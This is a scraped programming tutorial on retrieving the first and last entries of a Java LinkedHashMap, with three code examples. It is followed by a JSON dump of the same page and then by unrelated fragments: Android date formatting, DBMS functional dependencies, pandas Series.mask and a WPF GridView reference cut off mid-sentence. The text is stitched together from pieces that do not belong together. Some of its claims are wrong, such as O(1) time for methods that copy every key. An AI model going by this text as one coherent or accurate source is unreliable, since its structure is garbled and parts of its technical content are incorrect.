09 Jun, 2021 LinkedHashMap is a predefined class in Java which is similar to HashMap, containing key and its respective value unlike HashMap, In LinkedHashMap insertion order is preserved. The task is to get the first and last entry present in LinkedHashMap. Iteration to get last and first value. The first and the last entry in Map is the entry that is inserted first and the entry that is to be inserted last where insertion order is preserved. Methods: The naive approach using the for-each loop for iteration over Map. Converting the keys of LinkedHashMap to an integer array.Converting keys in LinkedHashMap to List like ArrayList to LinkedList. The naive approach using the for-each loop for iteration over Map. Converting the keys of LinkedHashMap to an integer array. Converting keys in LinkedHashMap to List like ArrayList to LinkedList. Illustration: Input : Key- 2 : Value-5 Key- 14 : Value-35 Key- 31 : Value-20 Key- 36 : Value-18 Key- 52 : Value-6 Output: Key Value First-> 2 5 Last -> 52 6 Method 1: Naive approach using the for-each loop for iteration over Map. Construct function getFirst() and getLast() getFirst() print the first entry getLast() move to last entry (index is equal to size of LinkedHashMap) Example: Java // Java Program to get first or last entry// from Java LinkedHashMap // Importing all class of// java.util packageimport java.util.*;// Importing java input/output classesimport java.io.*; class GFG { // getLast() method public static void getLast(LinkedHashMap<Integer, Integer> lhm) { int count = 1; for (Map.Entry<Integer, Integer> it : lhm.entrySet()) { if (count == lhm.size()) { System.out.println("Last Key-> "+it.getKey()); System.out.println("Last Value-> "+it.getValue()); return; } count++; } } // getFirst() method to get first element from // java LinkedHashMap public static void getFirst(LinkedHashMap<Integer, Integer> lhm) { int count = 1; for (Map.Entry<Integer, Integer> it : lhm.entrySet()) { if (count == 1) { System.out.println("First Key-> "+it.getKey()); System.out.println("First Value-> "+it.getValue()); return; } count++; } } // Main driver method public static void main(String[] args) { // Creating(defining) a LinkedHashMap LinkedHashMap<Integer, Integer> LHM = new LinkedHashMap<>(); // Adding elements to above LinkedHashMap LHM.put(2, 5); LHM.put(14, 35); LHM.put(36, 20); LHM.put(34, 18); LHM.put(52, 6); // Calling getFirst() method in main() getFirst(LHM); // Calling getLast() method in main() getLast(LHM); }} First Key-> 2 First Value-> 5 Last Key-> 52 Last Value-> 6 Time complexity: O(n) Method 2: Converting the keys of LinkedHashMap to an integer array. Algorithm: Getting first and value corresponding to the key. Printing last and value corresponding to the key. Pseudo Code : Integer[] aKeys = LHM.keySet().toArray(new Integer[LHM.size()]); // where LHM is name of LinkedHashMap created and aKeys of array to be converted. Example: Java // Java Program to get first or last entry// from Java LinkedHashMap// By converting Map to integer array // Importing all class of// java.util packageimport java.util.*;// Importing java input/output classesimport java.io.*; class GFG { // Main driver method public static void main(String[] args) { // Creating a LinkedHashMAp LinkedHashMap<Integer, Integer> LHM = new LinkedHashMap<>(); // Adding. 
elements to above LinkedHashMap // Custom inputs LHM.put(1, 8); LHM.put(2, 6); LHM.put(3, 7); LHM.put(4, 2); LHM.put(5, 5); // Getting all keys from the LinkedHashMap, and // converting it to an array Integer[] aKeys = LHM.keySet().toArray(new Integer[LHM.size()]); // Condition check // If array is having element // Print key and value if (aKeys.length > 0) { // Print first key and first value // From integer array System.out.println("First key-> " + aKeys[0]); System.out.println("First value-> " + LHM.get(aKeys[0])); // Print first key from integer array System.out.println("Last key-> " + aKeys[aKeys.length - 1]); // Print last value from integer array System.out.println( "Last value-> " + LHM.get(aKeys[aKeys.length - 1])); } }} First key-> 1 First value-> 8 Last key-> 5 Last value-> 5 Time Complexity: O(1) Method 3: Converting keys in LinkedHashMap to List like ArrayList to LinkedList. Algorithm Get first and the value corresponding to the key. Print last and the value corresponding to the key. Pseudo Code: List<Integer> lKeys = new ArrayList<Integer>(LHM.keySet()); // where LHM is name of LinkedHashMap and lKeys is name of List Example Java // Java Program to get first or last entry// from Java LinkedHashMap// By converting Map to List // Importing all class of// java.util packageimport java.util.*;// Importing java input/output classesimport java.io.*; // Main classclass GFG { // Main driver method public static void main(String[] args) { // Creating a LinkedHashMapc LinkedHashMap<Integer, Integer> LHM = new LinkedHashMap<>(); // Adding elements to above LinkedHashMap // Custom inputs LHM.put(1, 8); LHM.put(2, 6); LHM.put(3, 7); LHM.put(4, 2); LHM.put(5, 5); // Creating a List List<Integer> lKeys = new ArrayList<Integer>(LHM.keySet()); // Condition check // If there is single element in List // Print key and value if (lKeys.size() > 0) { // Print first key form List System.out.println("First key: " + lKeys.get(0)); // Print first value from List System.out.println("First value: " + LHM.get(lKeys.get(0))); // Print last key from List System.out.println( "Last key: " + lKeys.get(lKeys.size() - 1)); // Print last value from List System.out.println( "Last value: " + LHM.get(lKeys.get(lKeys.size() - 1))); } }} First key: 1 First value: 8 Last key: 5 Last value: 5 Time Complexity: O(1) anikaseth98 Java-LinkedHashMap Picked Technical Scripter 2020 Java Java Programs Technical Scripter Java Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Hashtable in Java Constructors in Java Different ways of Reading a text file in Java Comparator Interface in Java with Examples Java Math random() method with Examples Convert a String to Character array in Java Java Programming Examples Convert Double to Integer in Java Implementing a Linked List in Java using Class How to Iterate HashMap in Java?
[ { "code": null, "e": 23557, "s": 23529, "text": "\n09 Jun, 2021" }, { "code": null, "e": 23993, "s": 23557, "text": "LinkedHashMap is a predefined class in Java which is similar to HashMap, containing key and its respective value unlike HashMap, In LinkedHashMap insertion order is preserved. The task is to get the first and last entry present in LinkedHashMap. Iteration to get last and first value. The first and the last entry in Map is the entry that is inserted first and the entry that is to be inserted last where insertion order is preserved. " }, { "code": null, "e": 24002, "s": 23993, "text": "Methods:" }, { "code": null, "e": 24197, "s": 24002, "text": "The naive approach using the for-each loop for iteration over Map. Converting the keys of LinkedHashMap to an integer array.Converting keys in LinkedHashMap to List like ArrayList to LinkedList." }, { "code": null, "e": 24265, "s": 24197, "text": "The naive approach using the for-each loop for iteration over Map. " }, { "code": null, "e": 24323, "s": 24265, "text": "Converting the keys of LinkedHashMap to an integer array." }, { "code": null, "e": 24394, "s": 24323, "text": "Converting keys in LinkedHashMap to List like ArrayList to LinkedList." }, { "code": null, "e": 24408, "s": 24394, "text": "Illustration:" }, { "code": null, "e": 24416, "s": 24408, "text": "Input :" }, { "code": null, "e": 24434, "s": 24416, "text": "Key- 2 : Value-5" }, { "code": null, "e": 24453, "s": 24434, "text": "Key- 14 : Value-35" }, { "code": null, "e": 24472, "s": 24453, "text": "Key- 31 : Value-20" }, { "code": null, "e": 24491, "s": 24472, "text": "Key- 36 : Value-18" }, { "code": null, "e": 24509, "s": 24491, "text": "Key- 52 : Value-6" }, { "code": null, "e": 24517, "s": 24509, "text": "Output:" }, { "code": null, "e": 24531, "s": 24517, "text": "Key Value" }, { "code": null, "e": 24552, "s": 24531, "text": "First-> 2 5" }, { "code": null, "e": 24573, "s": 24552, "text": "Last -> 52 6" }, { "code": null, "e": 24647, "s": 24573, "text": "Method 1: Naive approach using the for-each loop for iteration over Map. 
" }, { "code": null, "e": 24691, "s": 24647, "text": "Construct function getFirst() and getLast()" }, { "code": null, "e": 24724, "s": 24691, "text": "getFirst() print the first entry" }, { "code": null, "e": 24795, "s": 24724, "text": "getLast() move to last entry (index is equal to size of LinkedHashMap)" }, { "code": null, "e": 24804, "s": 24795, "text": "Example:" }, { "code": null, "e": 24809, "s": 24804, "text": "Java" }, { "code": "// Java Program to get first or last entry// from Java LinkedHashMap // Importing all class of// java.util packageimport java.util.*;// Importing java input/output classesimport java.io.*; class GFG { // getLast() method public static void getLast(LinkedHashMap<Integer, Integer> lhm) { int count = 1; for (Map.Entry<Integer, Integer> it : lhm.entrySet()) { if (count == lhm.size()) { System.out.println(\"Last Key-> \"+it.getKey()); System.out.println(\"Last Value-> \"+it.getValue()); return; } count++; } } // getFirst() method to get first element from // java LinkedHashMap public static void getFirst(LinkedHashMap<Integer, Integer> lhm) { int count = 1; for (Map.Entry<Integer, Integer> it : lhm.entrySet()) { if (count == 1) { System.out.println(\"First Key-> \"+it.getKey()); System.out.println(\"First Value-> \"+it.getValue()); return; } count++; } } // Main driver method public static void main(String[] args) { // Creating(defining) a LinkedHashMap LinkedHashMap<Integer, Integer> LHM = new LinkedHashMap<>(); // Adding elements to above LinkedHashMap LHM.put(2, 5); LHM.put(14, 35); LHM.put(36, 20); LHM.put(34, 18); LHM.put(52, 6); // Calling getFirst() method in main() getFirst(LHM); // Calling getLast() method in main() getLast(LHM); }}", "e": 26445, "s": 24809, "text": null }, { "code": null, "e": 26504, "s": 26445, "text": "First Key-> 2\nFirst Value-> 5\nLast Key-> 52\nLast Value-> 6" }, { "code": null, "e": 26526, "s": 26504, "text": "Time complexity: O(n)" }, { "code": null, "e": 26594, "s": 26526, "text": "Method 2: Converting the keys of LinkedHashMap to an integer array." }, { "code": null, "e": 26606, "s": 26594, "text": "Algorithm: " }, { "code": null, "e": 26656, "s": 26606, "text": "Getting first and value corresponding to the key." }, { "code": null, "e": 26706, "s": 26656, "text": "Printing last and value corresponding to the key." }, { "code": null, "e": 26867, "s": 26706, "text": "Pseudo Code :\nInteger[] aKeys = LHM.keySet().toArray(new Integer[LHM.size()]);\n// where LHM is name of LinkedHashMap created and aKeys of array to be converted." }, { "code": null, "e": 26877, "s": 26867, "text": "Example: " }, { "code": null, "e": 26882, "s": 26877, "text": "Java" }, { "code": "// Java Program to get first or last entry// from Java LinkedHashMap// By converting Map to integer array // Importing all class of// java.util packageimport java.util.*;// Importing java input/output classesimport java.io.*; class GFG { // Main driver method public static void main(String[] args) { // Creating a LinkedHashMAp LinkedHashMap<Integer, Integer> LHM = new LinkedHashMap<>(); // Adding. 
elements to above LinkedHashMap // Custom inputs LHM.put(1, 8); LHM.put(2, 6); LHM.put(3, 7); LHM.put(4, 2); LHM.put(5, 5); // Getting all keys from the LinkedHashMap, and // converting it to an array Integer[] aKeys = LHM.keySet().toArray(new Integer[LHM.size()]); // Condition check // If array is having element // Print key and value if (aKeys.length > 0) { // Print first key and first value // From integer array System.out.println(\"First key-> \" + aKeys[0]); System.out.println(\"First value-> \" + LHM.get(aKeys[0])); // Print first key from integer array System.out.println(\"Last key-> \" + aKeys[aKeys.length - 1]); // Print last value from integer array System.out.println( \"Last value-> \" + LHM.get(aKeys[aKeys.length - 1])); } }}", "e": 28361, "s": 26882, "text": null }, { "code": null, "e": 28419, "s": 28361, "text": "First key-> 1\nFirst value-> 8\nLast key-> 5\nLast value-> 5" }, { "code": null, "e": 28441, "s": 28419, "text": "Time Complexity: O(1)" }, { "code": null, "e": 28522, "s": 28441, "text": "Method 3: Converting keys in LinkedHashMap to List like ArrayList to LinkedList." }, { "code": null, "e": 28533, "s": 28522, "text": "Algorithm " }, { "code": null, "e": 28583, "s": 28533, "text": "Get first and the value corresponding to the key." }, { "code": null, "e": 28634, "s": 28583, "text": "Print last and the value corresponding to the key." }, { "code": null, "e": 28781, "s": 28634, "text": "Pseudo Code:\nList<Integer> lKeys = new ArrayList<Integer>(LHM.keySet());\n// where LHM is name of LinkedHashMap and \n lKeys is name of List" }, { "code": null, "e": 28790, "s": 28781, "text": "Example " }, { "code": null, "e": 28795, "s": 28790, "text": "Java" }, { "code": "// Java Program to get first or last entry// from Java LinkedHashMap// By converting Map to List // Importing all class of// java.util packageimport java.util.*;// Importing java input/output classesimport java.io.*; // Main classclass GFG { // Main driver method public static void main(String[] args) { // Creating a LinkedHashMapc LinkedHashMap<Integer, Integer> LHM = new LinkedHashMap<>(); // Adding elements to above LinkedHashMap // Custom inputs LHM.put(1, 8); LHM.put(2, 6); LHM.put(3, 7); LHM.put(4, 2); LHM.put(5, 5); // Creating a List List<Integer> lKeys = new ArrayList<Integer>(LHM.keySet()); // Condition check // If there is single element in List // Print key and value if (lKeys.size() > 0) { // Print first key form List System.out.println(\"First key: \" + lKeys.get(0)); // Print first value from List System.out.println(\"First value: \" + LHM.get(lKeys.get(0))); // Print last key from List System.out.println( \"Last key: \" + lKeys.get(lKeys.size() - 1)); // Print last value from List System.out.println( \"Last value: \" + LHM.get(lKeys.get(lKeys.size() - 1))); } }}", "e": 30230, "s": 28795, "text": null }, { "code": null, "e": 30284, "s": 30230, "text": "First key: 1\nFirst value: 8\nLast key: 5\nLast value: 5" }, { "code": null, "e": 30306, "s": 30284, "text": "Time Complexity: O(1)" }, { "code": null, "e": 30320, "s": 30308, "text": "anikaseth98" }, { "code": null, "e": 30339, "s": 30320, "text": "Java-LinkedHashMap" }, { "code": null, "e": 30346, "s": 30339, "text": "Picked" }, { "code": null, "e": 30370, "s": 30346, "text": "Technical Scripter 2020" }, { "code": null, "e": 30375, "s": 30370, "text": "Java" }, { "code": null, "e": 30389, "s": 30375, "text": "Java Programs" }, { "code": null, "e": 30408, "s": 30389, "text": "Technical Scripter" }, { "code": null, "e": 30413, "s": 30408, "text": 
"Java" }, { "code": null, "e": 30511, "s": 30413, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 30520, "s": 30511, "text": "Comments" }, { "code": null, "e": 30533, "s": 30520, "text": "Old Comments" }, { "code": null, "e": 30551, "s": 30533, "text": "Hashtable in Java" }, { "code": null, "e": 30572, "s": 30551, "text": "Constructors in Java" }, { "code": null, "e": 30618, "s": 30572, "text": "Different ways of Reading a text file in Java" }, { "code": null, "e": 30661, "s": 30618, "text": "Comparator Interface in Java with Examples" }, { "code": null, "e": 30701, "s": 30661, "text": "Java Math random() method with Examples" }, { "code": null, "e": 30745, "s": 30701, "text": "Convert a String to Character array in Java" }, { "code": null, "e": 30771, "s": 30745, "text": "Java Programming Examples" }, { "code": null, "e": 30805, "s": 30771, "text": "Convert Double to Integer in Java" }, { "code": null, "e": 30852, "s": 30805, "text": "Implementing a Linked List in Java using Class" } ]
How to convert milliseconds to date format in Android?
This example demonstrates how do I convert milliseconds to date format in android. Step 1 − Create a new project in Android Studio, go to File ⇒ New Project and fill all required details to create a new project. Step 2 − Add the following code to res/layout/activity_main.xml. <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="match_parent" android:orientation="vertical" android:padding="4dp" tools:context=".MainActivity"> <TextView android:textStyle="bold" android:textSize="24sp" android:id="@+id/textView" android:layout_width="match_parent" android:layout_height="wrap_content"/> </LinearLayout> Step 3 − Add the following code to src/MainActivity.java import androidx.appcompat.app.AppCompatActivity; import android.os.Bundle; import android.widget.TextView; import java.text.SimpleDateFormat; public class MainActivity extends AppCompatActivity { TextView textView; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); textView = findViewById(R.id.textView); getDate(); } private void getDate() { SimpleDateFormat simpleDateFormat = new SimpleDateFormat("dd/MM/yyyy"); String dateString = simpleDateFormat.format(9897546853323L); textView.setText(String.format("Date: %s", dateString)); } } Step 4 − Add the following code to androidManifest.xml <?xml version="1.0" encoding="utf-8"?> <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="app.com.sample"> <application android:allowBackup="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:roundIcon="@mipmap/ic_launcher_round" android:supportsRtl="true" android:theme="@style/AppTheme"> <activity android:name=".MainActivity"> <intent-filter> <action android:name="android.intent.action.MAIN" /> <category android:name="android.intent.category.LAUNCHER" /> </intent-filter> </activity> </application> </manifest> Let's try to run your application. I assume you have connected your actual Android Mobile device with your computer. To run the app from the android studio, open one of your project's activity files and click Run icon from the toolbar. Select your mobile device as an option and then check your mobile device which will display your default screen − Click here to download the project code.
[ { "code": null, "e": 1145, "s": 1062, "text": "This example demonstrates how do I convert milliseconds to date format in android." }, { "code": null, "e": 1274, "s": 1145, "text": "Step 1 − Create a new project in Android Studio, go to File ⇒ New Project and fill all required details to create a new project." }, { "code": null, "e": 1339, "s": 1274, "text": "Step 2 − Add the following code to res/layout/activity_main.xml." }, { "code": null, "e": 1883, "s": 1339, "text": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<LinearLayout xmlns:android=\"http://schemas.android.com/apk/res/android\"\n xmlns:tools=\"http://schemas.android.com/tools\"\n android:layout_width=\"match_parent\"\n android:layout_height=\"match_parent\"\n android:orientation=\"vertical\"\n android:padding=\"4dp\"\n tools:context=\".MainActivity\">\n <TextView\n android:textStyle=\"bold\"\n android:textSize=\"24sp\"\n android:id=\"@+id/textView\"\n android:layout_width=\"match_parent\"\n android:layout_height=\"wrap_content\"/>\n</LinearLayout>" }, { "code": null, "e": 1940, "s": 1883, "text": "Step 3 − Add the following code to src/MainActivity.java" }, { "code": null, "e": 2626, "s": 1940, "text": "import androidx.appcompat.app.AppCompatActivity;\nimport android.os.Bundle;\nimport android.widget.TextView;\nimport java.text.SimpleDateFormat;\npublic class MainActivity extends AppCompatActivity {\n TextView textView;\n @Override\n protected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n setContentView(R.layout.activity_main);\n textView = findViewById(R.id.textView);\n getDate();\n }\n private void getDate() {\n SimpleDateFormat simpleDateFormat = new SimpleDateFormat(\"dd/MM/yyyy\");\n String dateString = simpleDateFormat.format(9897546853323L);\n textView.setText(String.format(\"Date: %s\", dateString));\n }\n}" }, { "code": null, "e": 2681, "s": 2626, "text": "Step 4 − Add the following code to androidManifest.xml" }, { "code": null, "e": 3351, "s": 2681, "text": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"app.com.sample\">\n <application\n android:allowBackup=\"true\"\n android:icon=\"@mipmap/ic_launcher\"\n android:label=\"@string/app_name\"\n android:roundIcon=\"@mipmap/ic_launcher_round\"\n android:supportsRtl=\"true\"\n android:theme=\"@style/AppTheme\">\n <activity android:name=\".MainActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n <category android:name=\"android.intent.category.LAUNCHER\" />\n </intent-filter>\n </activity>\n </application>\n</manifest>" }, { "code": null, "e": 3702, "s": 3351, "text": "Let's try to run your application. I assume you have connected your actual Android Mobile device with your computer. To run the app from the android studio, open one of your project's activity files and click Run icon from the toolbar. Select your mobile device as an option and then check your mobile device which will display your default screen −" }, { "code": null, "e": 3743, "s": 3702, "text": "Click here to download the project code." } ]
Differentiate between Partial Dependency and Fully Functional Dependency - GeeksforGeeks
24 Dec, 2021 Fully Functional Dependency :If X and Y are an attribute set of a relation, Y is fully functional dependent on X, if Y is functionally dependent on X but not on any proper subset of X.Example –In the relation ABC->D, attribute D is fully functionally dependent on ABC and not on any proper subset of ABC. That means that subsets of ABC like AB, BC, A, B, etc cannot determine D.Let us take another example – Supply table From the table, we can clearly see that neither supplier_id nor item_id can uniquely determine the price but both supplier_id and item_id together can do so. So we can say that price is fully functionally dependent on { supplier_id, item_id }. This summarizes and gives our fully functional dependency − { supplier_id , item_id } -> price Partial Functional Dependency :A functional dependency X->Y is a partial dependency if Y is functionally dependent on X and Y can be determined by any proper subset of X.For example, we have a relationship AC->B, A->D, and D->B. Now if we compute the closure of {A+}=ADB Here A is alone capable of determining B, which means B is partially dependent on AC.Let us take another example – Student table Here, we can see that both the attributes name and roll_no alone are able to uniquely identify a course. Hence we can say that the relationship is partially dependent. Full Functional Dependency Partial Functional Dependency smithdashdash Picked DBMS GATE CS DBMS Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Types of Functional dependencies in DBMS Introduction of Relational Algebra in DBMS What is Temporary Table in SQL? Two Phase Locking Protocol KDD Process in Data Mining Layers of OSI Model TCP/IP Model Page Replacement Algorithms in Operating Systems Types of Operating Systems Differences between TCP and UDP
[ { "code": null, "e": 24329, "s": 24301, "text": "\n24 Dec, 2021" }, { "code": null, "e": 24740, "s": 24329, "text": "Fully Functional Dependency :If X and Y are an attribute set of a relation, Y is fully functional dependent on X, if Y is functionally dependent on X but not on any proper subset of X.Example –In the relation ABC->D, attribute D is fully functionally dependent on ABC and not on any proper subset of ABC. That means that subsets of ABC like AB, BC, A, B, etc cannot determine D.Let us take another example – " }, { "code": null, "e": 24754, "s": 24740, "text": "Supply table " }, { "code": null, "e": 25059, "s": 24754, "text": "From the table, we can clearly see that neither supplier_id nor item_id can uniquely determine the price but both supplier_id and item_id together can do so. So we can say that price is fully functionally dependent on { supplier_id, item_id }. This summarizes and gives our fully functional dependency −" }, { "code": null, "e": 25094, "s": 25059, "text": "{ supplier_id , item_id } -> price" }, { "code": null, "e": 25481, "s": 25094, "text": "Partial Functional Dependency :A functional dependency X->Y is a partial dependency if Y is functionally dependent on X and Y can be determined by any proper subset of X.For example, we have a relationship AC->B, A->D, and D->B. Now if we compute the closure of {A+}=ADB Here A is alone capable of determining B, which means B is partially dependent on AC.Let us take another example –" }, { "code": null, "e": 25495, "s": 25481, "text": "Student table" }, { "code": null, "e": 25663, "s": 25495, "text": "Here, we can see that both the attributes name and roll_no alone are able to uniquely identify a course. Hence we can say that the relationship is partially dependent." }, { "code": null, "e": 25691, "s": 25663, "text": "Full Functional Dependency " }, { "code": null, "e": 25721, "s": 25691, "text": "Partial Functional Dependency" }, { "code": null, "e": 25735, "s": 25721, "text": "smithdashdash" }, { "code": null, "e": 25742, "s": 25735, "text": "Picked" }, { "code": null, "e": 25747, "s": 25742, "text": "DBMS" }, { "code": null, "e": 25755, "s": 25747, "text": "GATE CS" }, { "code": null, "e": 25760, "s": 25755, "text": "DBMS" }, { "code": null, "e": 25858, "s": 25760, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 25899, "s": 25858, "text": "Types of Functional dependencies in DBMS" }, { "code": null, "e": 25942, "s": 25899, "text": "Introduction of Relational Algebra in DBMS" }, { "code": null, "e": 25974, "s": 25942, "text": "What is Temporary Table in SQL?" }, { "code": null, "e": 26001, "s": 25974, "text": "Two Phase Locking Protocol" }, { "code": null, "e": 26028, "s": 26001, "text": "KDD Process in Data Mining" }, { "code": null, "e": 26048, "s": 26028, "text": "Layers of OSI Model" }, { "code": null, "e": 26061, "s": 26048, "text": "TCP/IP Model" }, { "code": null, "e": 26110, "s": 26061, "text": "Page Replacement Algorithms in Operating Systems" }, { "code": null, "e": 26137, "s": 26110, "text": "Types of Operating Systems" } ]
Python | Pandas Series.mask() - GeeksforGeeks
11 Feb, 2019 Pandas series is a One-dimensional ndarray with axis labels. The labels need not be unique but must be a hashable type. The object supports both integer- and label-based indexing and provides a host of methods for performing operations involving the index. Pandas Series.mask() function is used for masking purpose. This function replace values where the passed condition is True. Otherwise the value remains same. Syntax: Series.mask(cond, other=nan, inplace=False, axis=None, level=None, errors=’raise’, try_cast=False, raise_on_error=None) Parameter :cond : Where cond is False, keep the original value. Where True, replace with corresponding value from other.other : Entries where cond is True are replaced with corresponding value from other.inplace : Whether to perform the operation in place on the data.axis : Alignment axis if needed.level : Alignment level if needed. Returns : wh : same type as caller Example #1: Use Series.mask() function to replace the ‘Rio’ city in the given series object. # importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series(['New York', 'Chicago', 'Toronto', 'Lisbon', 'Rio']) # Create the Indexindex_ = ['City 1', 'City 2', 'City 3', 'City 4', 'City 5'] # set the indexsr.index = index_ # Print the seriesprint(sr) Output : Now we will use Series.mask() function to replace the ‘Rio’ city in the given series object. # replace 'Rio' with 'Tokyo'result = sr.mask(lambda x : x =='Rio', other = 'Tokyo') # Print the resultprint(result) Output : As we can see in the output, the Series.mask() function has successfully replaced the ‘Rio’ city with ‘Tokyo’ in the given series object. Example #2: Use Series.mask() function to mask all the values in the given series object which are greater than 50. # importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series([11, 21, 8, 18, 65, 84, 32, 10, 5, 24, 32]) # Print the seriesprint(sr) Output : Now we will use Series.mask() function to mask all the values greater than 50 in the given series object. # mask values greater than 50result = sr.mask(sr > 50) # Print the resultprint(result) Output :As we can see in the output, the Series.mask() function has successfully masked all the values greater than 50 in the given series object. Python pandas-series Python pandas-series-methods Python-pandas Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Box Plot in Python using Matplotlib Python | Get dictionary keys as a list Bar Plot in Matplotlib Multithreading in Python | Set 2 (Synchronization) Python Dictionary keys() method loops in python Python - Call function from another file Ways to filter Pandas DataFrame by column values Python | Convert set into a list Python program to find number of days between two given dates
[ { "code": null, "e": 23901, "s": 23873, "text": "\n11 Feb, 2019" }, { "code": null, "e": 24158, "s": 23901, "text": "Pandas series is a One-dimensional ndarray with axis labels. The labels need not be unique but must be a hashable type. The object supports both integer- and label-based indexing and provides a host of methods for performing operations involving the index." }, { "code": null, "e": 24316, "s": 24158, "text": "Pandas Series.mask() function is used for masking purpose. This function replace values where the passed condition is True. Otherwise the value remains same." }, { "code": null, "e": 24444, "s": 24316, "text": "Syntax: Series.mask(cond, other=nan, inplace=False, axis=None, level=None, errors=’raise’, try_cast=False, raise_on_error=None)" }, { "code": null, "e": 24779, "s": 24444, "text": "Parameter :cond : Where cond is False, keep the original value. Where True, replace with corresponding value from other.other : Entries where cond is True are replaced with corresponding value from other.inplace : Whether to perform the operation in place on the data.axis : Alignment axis if needed.level : Alignment level if needed." }, { "code": null, "e": 24814, "s": 24779, "text": "Returns : wh : same type as caller" }, { "code": null, "e": 24907, "s": 24814, "text": "Example #1: Use Series.mask() function to replace the ‘Rio’ city in the given series object." }, { "code": "# importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series(['New York', 'Chicago', 'Toronto', 'Lisbon', 'Rio']) # Create the Indexindex_ = ['City 1', 'City 2', 'City 3', 'City 4', 'City 5'] # set the indexsr.index = index_ # Print the seriesprint(sr)", "e": 25184, "s": 24907, "text": null }, { "code": null, "e": 25193, "s": 25184, "text": "Output :" }, { "code": null, "e": 25286, "s": 25193, "text": "Now we will use Series.mask() function to replace the ‘Rio’ city in the given series object." }, { "code": "# replace 'Rio' with 'Tokyo'result = sr.mask(lambda x : x =='Rio', other = 'Tokyo') # Print the resultprint(result)", "e": 25403, "s": 25286, "text": null }, { "code": null, "e": 25412, "s": 25403, "text": "Output :" }, { "code": null, "e": 25666, "s": 25412, "text": "As we can see in the output, the Series.mask() function has successfully replaced the ‘Rio’ city with ‘Tokyo’ in the given series object. Example #2: Use Series.mask() function to mask all the values in the given series object which are greater than 50." }, { "code": "# importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series([11, 21, 8, 18, 65, 84, 32, 10, 5, 24, 32]) # Print the seriesprint(sr)", "e": 25820, "s": 25666, "text": null }, { "code": null, "e": 25829, "s": 25820, "text": "Output :" }, { "code": null, "e": 25935, "s": 25829, "text": "Now we will use Series.mask() function to mask all the values greater than 50 in the given series object." }, { "code": "# mask values greater than 50result = sr.mask(sr > 50) # Print the resultprint(result)", "e": 26023, "s": 25935, "text": null }, { "code": null, "e": 26170, "s": 26023, "text": "Output :As we can see in the output, the Series.mask() function has successfully masked all the values greater than 50 in the given series object." 
}, { "code": null, "e": 26191, "s": 26170, "text": "Python pandas-series" }, { "code": null, "e": 26220, "s": 26191, "text": "Python pandas-series-methods" }, { "code": null, "e": 26234, "s": 26220, "text": "Python-pandas" }, { "code": null, "e": 26241, "s": 26234, "text": "Python" }, { "code": null, "e": 26339, "s": 26241, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 26348, "s": 26339, "text": "Comments" }, { "code": null, "e": 26361, "s": 26348, "text": "Old Comments" }, { "code": null, "e": 26397, "s": 26361, "text": "Box Plot in Python using Matplotlib" }, { "code": null, "e": 26436, "s": 26397, "text": "Python | Get dictionary keys as a list" }, { "code": null, "e": 26459, "s": 26436, "text": "Bar Plot in Matplotlib" }, { "code": null, "e": 26510, "s": 26459, "text": "Multithreading in Python | Set 2 (Synchronization)" }, { "code": null, "e": 26542, "s": 26510, "text": "Python Dictionary keys() method" }, { "code": null, "e": 26558, "s": 26542, "text": "loops in python" }, { "code": null, "e": 26599, "s": 26558, "text": "Python - Call function from another file" }, { "code": null, "e": 26648, "s": 26599, "text": "Ways to filter Pandas DataFrame by column values" }, { "code": null, "e": 26681, "s": 26648, "text": "Python | Convert set into a list" } ]
WPF - Gridview
A GridView is a control that displays data items in rows and columns. Actually a ListView displays data. By default, it contains a GridView. The hierarchical inheritance of GridView class is as follows − Background Gets or sets a brush that provides the background of the control. (Inherited from Control) BorderThickness Gets or sets the border thickness of a control. (Inherited from Control) DataContext Gets or sets the data context for a FrameworkElement when it participates in data binding. (Inherited from FrameworkElement) FontFamily Gets or sets the font used to display text in the control. (Inherited from Control) FontSize Gets or sets the size of the text in this control. (Inherited from Control) FontStyle Gets or sets the style in which the text is rendered. (Inherited from Control) FontWeight Gets or sets the thickness of the specified font. (Inherited from Control) Foreground Gets or sets a brush that describes the foreground color. (Inherited from Control) GroupStyle Gets a collection of GroupStyle objects that define the appearance of each level of groups. (Inherited from ItemsControl) Header Gets or sets the content for the list header. (Inherited from ListViewBase) Height Gets or sets the suggested height of a FrameworkElement. (Inherited from FrameworkElement) HorizontalAlignment Gets or sets the horizontal alignment characteristics that are applied to a FrameworkElement when it is composed in a layout parent, such as a panel or items control. (Inherited from FrameworkElement) HorizontalContentAlignment Gets or sets the horizontal alignment of the control's content. (Inherited from Control) Items Gets the collection used to generate the content of the control. (Inherited from ItemsControl) ItemsSource Gets or sets an object source used to generate the content of the ItemsControl. (Inherited from ItemsControl) ItemTemplate Gets or sets the DataTemplate used to display each item. (Inherited from ItemsControl) Margin Gets or sets the outer margin of a FrameworkElement. (Inherited from FrameworkElement) Name Gets or sets the identifying name of the object. When a XAML processor creates the object tree from XAML markup, run-time code can refer to the XAML-declared object by this name. (Inherited from FrameworkElement) Opacity Gets or sets the degree of the object's opacity. (Inherited from UIElement) Resources Gets the locally defined resource dictionary. In XAML, you can establish resource items as child object elements of a frameworkElement.Resources property element, through XAML implicit collection syntax. (Inherited from FrameworkElement) SelectedIndex Gets or 